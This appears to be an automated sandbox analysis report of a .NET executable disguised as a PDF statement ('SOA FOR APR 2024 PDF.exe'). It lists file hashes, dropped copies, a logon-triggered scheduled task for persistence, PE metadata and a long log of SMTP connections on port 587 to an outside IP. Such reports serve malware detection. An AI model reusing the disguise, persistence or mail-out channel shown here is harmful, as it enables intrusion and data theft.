                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                Process:C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2232
                                Entropy (8bit):5.380805901110357
                                Encrypted:false
                                SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//8M0Uyus:lGLHxvCsIfA2KRHmOugw1s
                                MD5:B11E25ABF5BF7766D7D7437596AFFED0
                                SHA1:D673CFF28D1C21A672BFE165614629B2BB23DE93
                                SHA-256:EE402CA8A7E7FA1F95CD644AFE756C8AF734E810797FD3E9C6762FCC2510F3F6
                                SHA-512:D4C19BF1948BCF50899840F4B670ECF7510D65597054A89963D3155DB3869E65F2ABA2F6CE9C9E5F18890A65719E514E1D1EC6394EF99DF21E60F8220FA157C4
                                Malicious:false
                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1580
                                Entropy (8bit):5.102838589420805
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOxvn:cgergYrFdOFzOzN33ODOiDdKrsuTCv
                                MD5:86AAC1A561EE5A392DE50B16A2CBB61A
                                SHA1:895CF6E52F0E56941AB14E1287E8173F1DB7CF52
                                SHA-256:E1C802092F0FDE389CFC62DC3D054ADAF017A66B37D392FED9A1A8284AC369D3
                                SHA-512:6A8F4C47A0D1AF7049D5CEC1E12E28D385C91398392591B57FB0D6A30FB78DC58F150369118F917A5EFEEE22507D2168521DA68A23EFBA65B52618195E2FB24E
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                Process:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1580
                                Entropy (8bit):5.102838589420805
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOxvn:cgergYrFdOFzOzN33ODOiDdKrsuTCv
                                MD5:86AAC1A561EE5A392DE50B16A2CBB61A
                                SHA1:895CF6E52F0E56941AB14E1287E8173F1DB7CF52
                                SHA-256:E1C802092F0FDE389CFC62DC3D054ADAF017A66B37D392FED9A1A8284AC369D3
                                SHA-512:6A8F4C47A0D1AF7049D5CEC1E12E28D385C91398392591B57FB0D6A30FB78DC58F150369118F917A5EFEEE22507D2168521DA68A23EFBA65B52618195E2FB24E
                                Malicious:true
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                Process:C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1580
                                Entropy (8bit):5.102838589420805
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOxvn:cgergYrFdOFzOzN33ODOiDdKrsuTCv
                                MD5:86AAC1A561EE5A392DE50B16A2CBB61A
                                SHA1:895CF6E52F0E56941AB14E1287E8173F1DB7CF52
                                SHA-256:E1C802092F0FDE389CFC62DC3D054ADAF017A66B37D392FED9A1A8284AC369D3
                                SHA-512:6A8F4C47A0D1AF7049D5CEC1E12E28D385C91398392591B57FB0D6A30FB78DC58F150369118F917A5EFEEE22507D2168521DA68A23EFBA65B52618195E2FB24E
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                Process:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):722944
                                Entropy (8bit):7.94272561913419
                                Encrypted:false
                                SSDEEP:12288:mWYIPXjxannnHg2rA1a8vHKzUREMEngfnRhU0KjqdAwz725zfjVfjKIsj+1F0DxY:mWYIPFannnHg2Qa86n0LdAA70ztjRh0W
                                MD5:7A6E9D01D9162C7537BA8091187E4235
                                SHA1:F5B69F4B0EC8CD0A4B7BAB26A0DE167C8CC535CD
                                SHA-256:7FD14673F73717B024728AE4248BE0A1579F480A261C4F4D94742F230A01CB47
                                SHA-512:7AF388861A5BE63B87E8159E2B20BF78D110517B8DB6A314A7128CBA29075734BE43C543B1D701E360778D539951C58E3C06BC2EE2E2AD6855D0067FFF55A199
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 45%
                                • Antivirus: Virustotal, Detection: 52%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)f..............0...... ........... ........@.. .......................@............`.....................................O............................ ....................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:false
                                Preview:[ZoneTransfer]....ZoneId=0
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.94272561913419
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                File name:SOA FOR APR 2024 PDF.exe
                                File size:722'944 bytes
                                MD5:7a6e9d01d9162c7537ba8091187e4235
                                SHA1:f5b69f4b0ec8cd0a4b7bab26a0de167c8cc535cd
                                SHA256:7fd14673f73717b024728ae4248be0a1579f480a261c4f4d94742f230a01cb47
                                SHA512:7af388861a5be63b87e8159e2b20bf78d110517b8db6a314a7128cba29075734be43c543b1d701e360778d539951c58e3c06bc2ee2e2ad6855d0067fff55a199
                                SSDEEP:12288:mWYIPXjxannnHg2rA1a8vHKzUREMEngfnRhU0KjqdAwz725zfjVfjKIsj+1F0DxY:mWYIPFannnHg2Qa86n0LdAA70ztjRh0W
                                TLSH:13F4238561FDCB8BF83F5BB44070192493F5BD696860E3189FC111EC9B23785A261BAB
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)f..............0...... ........... ........@.. .......................@............`................................
                                Icon Hash:c14e4c4c4c4c4f41
                                Entrypoint:0x4afcfa
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x6629B98C [Thu Apr 25 02:01:48 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Instruction
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0xafca8 | 0x4f | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x1008 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb2000 | 0xc | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x2000 | 0xadd20 | 0xae000 | d1844d91aa8a9d976e370c8f9467037a | False | 0.9530043327945402 | data | 7.967897552415294 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc | 0xb0000 | 0x1008 | 0x1800 | 97cd8a03d00455574c2f9938c520bf3e | False | 0.5411783854166666 | data | 5.083108720564573 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0xb2000 | 0xc | 0x800 | 3b9e26e8b113c26ab4ad596d024629af | False | 0.01611328125 | data | 0.03037337037012526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                RT_ICON | 0xb00c8 | 0xc08 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9308441558441558
                                RT_GROUP_ICON | 0xb0ce0 | 0x14 | data | | | 1.05
                                RT_VERSION | 0xb0d04 | 0x300 | MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4" | | | 0.4427083333333333
                                DLL | Import
                                mscoree.dll | _CorExeMain
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Apr 26, 2024 09:03:40.511190891 CEST5874972950.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.517776966 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.520560980 CEST5874972950.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.520770073 CEST49729587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.528311968 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.528461933 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.716232061 CEST5874972950.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.716295958 CEST5874972950.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.716593027 CEST49729587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.716676950 CEST49729587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.716712952 CEST49729587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.716733932 CEST49729587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.724020004 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.724169016 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.725251913 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.725316048 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.725357056 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.725438118 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.726977110 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.912470102 CEST5874972950.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.912488937 CEST5874972950.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.912663937 CEST5874972950.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.913031101 CEST5874972950.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.921175003 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.921247005 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.921293974 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.921349049 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.922856092 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.922872066 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.922887087 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.922900915 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:40.922979116 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:40.922979116 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:41.017960072 CEST49729587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:41.118330002 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.118427992 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:41.119463921 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.119528055 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:41.119796991 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.119921923 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:41.314137936 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.314249992 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:41.315130949 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.315145969 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.315231085 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:41.315771103 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.315912962 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:41.315912962 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:41.316020966 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.316062927 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.316133022 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.509996891 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.510149002 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.510202885 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.510217905 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.510258913 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.510773897 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.510811090 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.511018991 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.511034012 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.511096954 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.511130095 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.511177063 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.511190891 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.511658907 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.511713028 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.511754036 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.512034893 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.512471914 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:41.675848961 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:44.549894094 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:44.749679089 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:44.750394106 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:45.507703066 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:45.703645945 CEST5874972850.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:45.704770088 CEST49729587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:45.704773903 CEST49728587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:45.900580883 CEST5874972950.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:45.904206038 CEST49729587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:45.907844067 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:46.111887932 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:46.112150908 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:46.414268017 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:46.414396048 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:46.611557007 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:46.611768961 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:46.809900045 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:46.810338974 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:47.267976046 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:47.429617882 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:47.429857016 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:47.464036942 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:47.979731083 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:47.979881048 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:48.190289974 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:48.190359116 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:48.192380905 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:48.388315916 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:48.388669014 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:48.389642954 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:48.596081972 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:48.596313000 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:48.792958975 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:48.793267012 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:48.991461039 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:48.991750002 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:49.188009024 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.195868969 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:49.433640003 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.455751896 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.462877035 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:49.659990072 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.660037994 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.660537004 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:49.660537958 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:49.660537958 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:49.662007093 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:49.662007093 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:49.862771034 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.862788916 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.862813950 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.862854958 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:49.863089085 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.863104105 CEST5874973050.87.195.61192.168.2.5
